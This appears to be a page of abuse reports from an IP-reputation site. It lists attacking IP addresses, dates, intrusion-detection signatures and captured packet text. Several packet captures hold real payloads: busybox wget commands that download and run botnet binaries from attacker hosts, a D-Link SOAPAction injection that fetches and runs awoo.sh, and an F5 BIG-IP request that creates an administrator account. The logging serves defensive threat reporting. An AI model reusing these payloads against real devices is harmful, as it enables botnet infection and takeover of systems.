๐ฉ๐ช
45.145.42.234
07 Aug 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x
2024-08-07 07:57:54 Source ...
show more
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1) 5x
2024-08-07 07:57:54 Source Ports UDP 50906,45573, 42614, 43275, 33057, 37465 > Destination port 9034
show less
SQL Injection
๐ฎ๐ณ
128.199.16.182
17 Jun 2024
Port scanning (Port 3389) on various devices.
Port Scan
Port Scan
๐ฎ๐ณ
117.242.239.219
27 May 2024
SERVER-WEBAPP DD-WRT httpd cgi-bin remote command execution attempt (1:26275:5)
Time: 2024-05-25 02 ...
show more
SERVER-WEBAPP DD-WRT httpd cgi-bin remote command execution attempt (1:26275:5)
Time: 2024-05-25 02:07:35 (Src Port: 49777, Dst Port: 8443)
Packet Text: ...
.....
....E..([email protected] ...
dj..q .........P. .....
show less
SQL Injection
๐ณ๐ฑ
92.249.48.41
22 May 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-05-21 17:44:01 (Src ...
show more
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-05-21 17:44:01 (Src Port: 40198, Dst Port: 9034)
Packet Text: ..]....K.._...E....1......\.0)?.-...#J.u..orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://91.92.252.157/rebirth.mpsl; chmod 777 *; ./rebirth.mpsl; #
show less
SQL Injection
๐บ๐ธ
206.189.204.202
29 Apr 2024
SERVER-WEBAPP F5 BIG-IP AJP authentication bypass attempt
Time 2024-04-26 15:59:58, (Src Port: 510 ...
show more
SERVER-WEBAPP F5 BIG-IP AJP authentication bypass attempt
Time 2024-04-26 15:59:58, (Src Port: 51054, Dst Port: 80)
Packet Text: ...
.....
....E..,....@.......
dd .n.P........P. .......HTTP/1.1.../tmui/Control/form...127.0.0.1...localhost...localhost..P.....Tmui-Dubbuf...BBBBBBBBBBB..
REMOTEROLE...0.....localhost....admin...q_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=iAEKx&name_before=&passwd=Ilt7rTMJAcBE&passwd_before=&finished=x&finished_before=...
show less
Web App Attack
๐ณ๐ฑ
45.159.188.241
19 Jan 2024
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-01-19 03:14:46 UDP ( ...
show more
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2024-01-19 03:14:46 UDP (Src Port: 37202, Dst Port: 9034)
Packet Text: ..]....K.._...E....1......-...?.-..R#J.l..orf;cd /tmp||cd /var&&/bin/busybox wget https://paradox-team.dev/Anti-Honey-Pot/x86_64 -O 11&&./11;#
show less
SQL Injection
๐ฉ๐ช
157.90.250.90
11 Jan 2024
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
IP address seen in cal ...
show more
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
IP address seen in callback from attempt initiated from 159.203.23.44
Time 2024-01-10 17:12:45
show less
Hacking
๐จ๐ฆ
159.203.23.44
11 Jan 2024
...
.....
....E.......@......,
dd..".P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:8 ...
show more
...
.....
....E.......@......,
dd..".P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
show less
Hacking
๐ฎ๐ณ
59.178.92.220
19 Dec 2023
Time 2023-12-18 21:43:22 (Src Port: 43166, Dst Port: 80)
Packet Text: ...
.....
....E.......@...; ...
show more
Time 2023-12-18 21:43:22 (Src Port: 43166, Dst Port: 80)
Packet Text: ...
.....
....E.......@...;.\.
dd ...P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
show less
Hacking
๐ณ๐ฑ
134.19.179.195
14 Dec 2023
Time 2023-12-12 23:42:22
Source port 44959 UDP / Destination 35442 / udp
Hacking
๐ณ๐ฑ
94.156.6.92
31 Oct 2023
Seen an packet info of attack from 94.156.6.66, possible callback or malware host
Exploited Host
๐ณ๐ฑ
94.156.6.66
31 Oct 2023
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2023-10-31 12:28:11 (Src ...
show more
SERVER-OTHER RealTek UDPServer command injection attempt (1:58853:1)
Time 2023-10-31 12:28:11 (Src Port: 34351, Dst Port: 9034)
Packet Text: ..]......,E...E(...1....(.^..B?.$../#J.q..orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://94.156.6.92/uwu/mpel; chmod +x mpsl; ./mpsl rt.mpsl; #
show less
SQL Injection
๐บ๐ธ
107.175.212.32
31 Oct 2023
Various unauthorized attempts between 2023-10-31 10:51:44 - 2023-10-31 12:47:33
Hacking
๐ฐ๐ท
222.112.82.141
31 Oct 2023
Unauthorized attempt 2023-10-31 03:25:00
Source port 49617 > Destination port 61616
Hacking
๐ณ๐ฑ
194.180.48.119
18 Oct 2023
Unauthorized attempt 2023-10-18 08:50:53
Source Port 50555 > Destination Port 25
Hacking
๐ณ๐ฑ
81.161.229.137
17 Oct 2023
Time: 2023-10-17 02:42:37
Unsolicited telnet attempt (Source Port 41183 > Destination port 23)
SSH
๐ฆ๐บ
154.6.147.99
04 Oct 2023
SERVER-WEBAPP PHPUnit PHP remote code execution attempt (1:45749:2)
Time 2023-10-04 12:12:17 (Src P ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt (1:45749:2)
Time 2023-10-04 12:12:17 (Src Port: 50938, Dst Port: 80)
Packet Text: ...
.....
....E..;[email protected]
dd ...P........P. .....<?php phpinfo(); ?>
show less
Web App Attack
๐ณ๐ฑ
45.81.39.51
04 Oct 2023
Approx 2023-10-03 16:57:13
Port scan attempted on destination port 4145
Port Scan
๐บ๐ธ
45.79.167.216
02 Oct 2023
SERVER-WEBAPP D-Link multiple products HNAP SOAPAction header command injection attempt (1:34300:3)
...
show more
SERVER-WEBAPP D-Link multiple products HNAP SOAPAction header command injection attempt (1:34300:3)
Time 2023-10-01 07:12:41 (Src Port: 49176, Dst Port: 80)
Packet Text: ...
.....
[email protected] ..
dd....P........P. .....Host: 63.225.36.196:80
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://178.79.158.33/awoo.sh;chmod 777 awoo.sh;sh awoo.sh selfrep.dlink;rm -rf awoo.sh`"
Content-Length: 0
show less
Web App Attack
๐ฉ๐ช
148.153.34.82
26 Sep 2023
2023-09-25 18:50:26 - CnC activity
Source 9313 Destination 445
Hacking
๐ฉ๐ช
104.248.242.202
21 Sep 2023
Unauthorized attempts 2023-09-21 09:49:11
Source port 53171 > Destination port 33890 & 3385
Hacking
๐ฆ๐บ
218.215.153.252
18 Sep 2023
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time: 2023-09-18 07:42 ...
show more
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time: 2023-09-18 07:42:02 (Src Port: 53232, Dst Port: 80)
Packet Text: ...
.....
....E.......@.......
dd....P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
show less
Hacking
๐ฌ๐ง
46.101.18.185
01 Sep 2023
MALWARE-CNC Win.Trojan.Remcos variant outbound connection (1:47299:1)
Time: 2023-09-01 09:56:29 (Sr ...
show more
MALWARE-CNC Win.Trojan.Remcos variant outbound connection (1:47299:1)
Time: 2023-09-01 09:56:29 (Src Port: 35834, Dst Port: 80)
Packet Text: ..]......,[email protected] ..?.$....P.fV..g..P...43......]....0.X......n....3*...'..k...
G...W..z.Oe...aFCy.sA......C.p.*.....b.v.G./..&[email protected] ".. .....Z.&e...
X'.....GH./~s;`(&.).K_.........Y7....n..*#.L
......sz.s.W.../..0*..~3E].M..............(....."eUY.E:I2_....\.~.
c~..rZ./U...f.fic^....yQ&..`..........7.A..7p..3......LI&.R.mE..
.....T.<Rm-<.............:z..y....M./..e..>....v.%..*{
....}QB.7...b.F\.w..H....!..<.Y......1..2...s..
sN..S.;|.d.s.\i.Vq...]M..6........"
..?....).9..:......!...v.9....;q.V.....x...Fv..._.!...C/............0..5.D
show less
Hacking
๐บ๐ธ
172.56.169.154
01 Sep 2023
SERVER-WEBAPP PHPUnit PHP remote code execution attempt (1:45749:2)
Time: 2023-08-31 23:41:12 (Src ...
show more
SERVER-WEBAPP PHPUnit PHP remote code execution attempt (1:45749:2)
Time: 2023-08-31 23:41:12 (Src Port: 24769, Dst Port: 80)
Packet Text: ...
.....
....E..;[email protected] ..
dd.`..P........P. .....<?php phpinfo(); ?>
show less
Web App Attack
๐บ๐ธ
199.123.2.129
01 Sep 2023
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time: 2023-09-01 02:15 ...
show more
MALWARE-CNC User-Agent known malicious user-agent string - Mirai (1:58992:1)
Time: 2023-09-01 02:15:19 (Src Port: 36718, Dst Port: 80)
Packet Text: ...
.....
....E.......@....{..
dd .n.P........P. .....User-Agent: Hello, world
Host: 127.0.0.1:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
show less
Hacking